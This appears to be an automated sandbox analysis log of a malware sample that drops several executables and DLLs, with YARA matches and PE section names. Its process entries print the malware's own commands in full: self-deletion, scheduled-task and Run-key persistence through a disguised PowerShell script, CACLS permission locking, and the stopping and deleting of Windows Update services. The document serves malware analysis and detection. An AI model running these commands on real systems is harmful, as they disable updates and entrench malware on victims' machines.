Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings |
Source: unknown | Process created: C:\Users\user\Desktop\DQxttu2Qrr.exe C:\Users\user\Desktop\DQxttu2Qrr.exe |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 |
Source: C:\ProgramData\61312899942613011832.exe | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F |
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe" |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' } |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit |
Source: C:\ProgramData\61312899942613011832.exe | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: unknown unknown |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' } |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx)); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN); |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt00 |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt01 |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt02 |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: EVjKc_MI |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: @]topACL |
Source: nppshell[1].exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: nppshell[1].exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: nppshell[1].exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: nppshell[1].exe.0.dr | Static PE information: section name: EVjKc_MI |
Source: nppshell[1].exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: nppshell[1].exe.0.dr | Static PE information: section name: @]topACL |
Source: gntuud.exe.4.dr | Static PE information: section name: lB@dO\ih |
Source: gntuud.exe.4.dr | Static PE information: section name: Fh?jG[OJ |
Source: gntuud.exe.4.dr | Static PE information: section name: qNR5:WbS |
Source: gntuud.exe.4.dr | Static PE information: section name: z?fd8ijJ |
Source: gntuud.exe.4.dr | Static PE information: section name: CV?7x>JO |
Source: gntuud.exe.4.dr | Static PE information: section name: EVjKc_MI |
Source: gntuud.exe.4.dr | Static PE information: section name: dT<:EHzj |
Source: gntuud.exe.4.dr | Static PE information: section name: @]topACL |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: nUPwRZiK |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: syncfiles.dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles.dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles.dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles.dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles.dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles.dll.13.dr | Static PE information: section name: nUPwRZiK |
Source: syncfiles.dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles.dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: cred64[1].dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64[1].dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64[1].dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64[1].dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64[1].dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64[1].dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64[1].dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64[1].dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64[1].dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: cred64.dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64.dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64.dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64.dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64.dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64.dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64.dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64.dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64.dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64[1].exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64[1].exe.13.dr | Static PE information: section name: n9Mms2uS |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64[1].exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64[1].exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64[1].exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64[1].exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64[1].exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: Emit64.exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64.exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64.exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64.exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64.exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64.exe.13.dr | Static PE information: section name: n9Mms2uS |
Source: Emit64.exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64.exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64.exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64.exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64.exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64.exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64.exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64.exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK0 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .symtab |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK1 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK2 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK3 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK0 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .symtab |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK1 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK2 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK3 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 87*qGv;7 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: ^NsFAbb[ |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 4.ps1S[" |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: l^D/X#s1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: aAyXB94] |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: n9Mms2uS |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 7u=]29J1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: *<5LK<h` |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: Ug$Va';z |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: dA:<*dF( |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: r,Ht]nHV |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: m$m2M1,9 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: o?%]P5Wl |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: lNMkoK?T |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 660005 value: E9 FB 99 28 77 |
